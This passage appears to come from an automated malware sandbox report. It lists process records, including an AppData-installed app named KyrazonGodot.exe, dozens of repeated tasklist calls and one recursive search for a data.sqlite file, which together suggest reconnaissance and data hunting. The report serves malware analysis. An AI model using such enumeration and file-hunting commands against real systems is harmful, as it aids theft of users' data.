                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:31
                                                                                    Start time:17:54:33
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:32
                                                                                    Start time:17:54:33
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:33
                                                                                    Start time:17:54:34
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:34
                                                                                    Start time:17:54:34
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:35
                                                                                    Start time:17:54:34
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:36
                                                                                    Start time:17:54:35
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:37
                                                                                    Start time:17:54:35
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:38
                                                                                    Start time:17:54:35
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:39
                                                                                    Start time:17:54:36
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:40
                                                                                    Start time:17:54:36
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:41
                                                                                    Start time:17:54:36
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:42
                                                                                    Start time:17:54:38
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:43
                                                                                    Start time:17:54:38
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:44
                                                                                    Start time:17:54:38
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:45
                                                                                    Start time:17:54:38
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:46
                                                                                    Start time:17:54:39
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:47
                                                                                    Start time:17:54:39
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:48
                                                                                    Start time:17:54:40
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe"
                                                                                    Imagebase:0x7ff6615b0000
                                                                                    File size:172'671'488 bytes
                                                                                    MD5 hash:EEB12AAC1FF31A9D17BA437700CAF9D6
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:49
                                                                                    Start time:17:54:40
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:50
                                                                                    Start time:17:54:40
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:51
                                                                                    Start time:17:54:40
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:52
                                                                                    Start time:17:54:42
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1640 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
                                                                                    Imagebase:0x7ff6615b0000
                                                                                    File size:172'671'488 bytes
                                                                                    MD5 hash:EEB12AAC1FF31A9D17BA437700CAF9D6
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:53
                                                                                    Start time:17:54:41
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:54
                                                                                    Start time:17:54:41
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:55
                                                                                    Start time:17:54:42
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:56
                                                                                    Start time:17:54:42
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:57
                                                                                    Start time:17:54:42
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:58
                                                                                    Start time:17:54:44
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2304 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
                                                                                    Imagebase:0x7ff6615b0000
                                                                                    File size:172'671'488 bytes
                                                                                    MD5 hash:EEB12AAC1FF31A9D17BA437700CAF9D6
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:59
                                                                                    Start time:17:54:42
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:60
                                                                                    Start time:17:54:44
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:61
                                                                                    Start time:17:54:44
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:62
                                                                                    Start time:17:54:44
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:63
                                                                                    Start time:17:54:45
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:64
                                                                                    Start time:17:54:45
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:65
                                                                                    Start time:17:54:45
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:66
                                                                                    Start time:17:54:45
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:67
                                                                                    Start time:17:54:45
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:68
                                                                                    Start time:17:54:45
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:69
                                                                                    Start time:17:54:45
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:70
                                                                                    Start time:17:54:45
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:71
                                                                                    Start time:17:54:45
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:72
                                                                                    Start time:17:54:45
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:73
                                                                                    Start time:17:54:45
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\where.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:where /r . data.sqlite
                                                                                    Imagebase:0x7ff7ec1b0000
                                                                                    File size:43'008 bytes
                                                                                    MD5 hash:3CF958B0F63FB1D74F7FCFE14B039A58
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:74
                                                                                    Start time:17:54:45
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:75
                                                                                    Start time:17:54:46
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:76
                                                                                    Start time:17:54:46
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:77
                                                                                    Start time:17:54:46
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:79
                                                                                    Start time:17:54:48
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:80
                                                                                    Start time:17:54:48
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:81
                                                                                    Start time:17:54:48
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:tasklist
                                                                                    Imagebase:0x7ff62f050000
                                                                                    File size:106'496 bytes
                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:82
                                                                                    Start time:17:54:49
                                                                                    Start date:06/08/2024
                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                                                                    Imagebase:0x7ff6a3bc0000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    General

                                                                                    Target ID:83
                                                                                    Start time:17:54:49
